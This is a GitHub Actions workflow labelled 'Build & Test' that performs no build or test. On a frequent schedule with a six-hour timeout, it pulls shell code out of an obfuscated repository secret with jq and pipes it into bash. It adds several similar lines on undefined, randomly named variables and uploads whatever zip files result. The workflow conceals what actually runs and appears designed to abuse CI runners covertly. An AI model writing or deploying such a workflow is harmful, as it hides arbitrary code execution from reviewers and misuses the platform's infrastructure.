name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '20 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          mg165: ${{ secrets.mg165 }}
        run: |
          printf '%s' "$mg165" | jq -r .atj137 | /bin/bash
          echo $ddz86 | jq -r .cumo9 | /bin/bash
          printf '%s' "$h67" | jq -r .w8 | /bin/bash
          echo $olmsr8 | jq -r .kvo314 | /bin/bash
          echo $zift50732 | jq -r .fs20 | /bin/bash
          echo $blf7 | jq -r .wdlpb28630 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: VsD6IqSW
          path: "*.zip"
          retention-days: 1
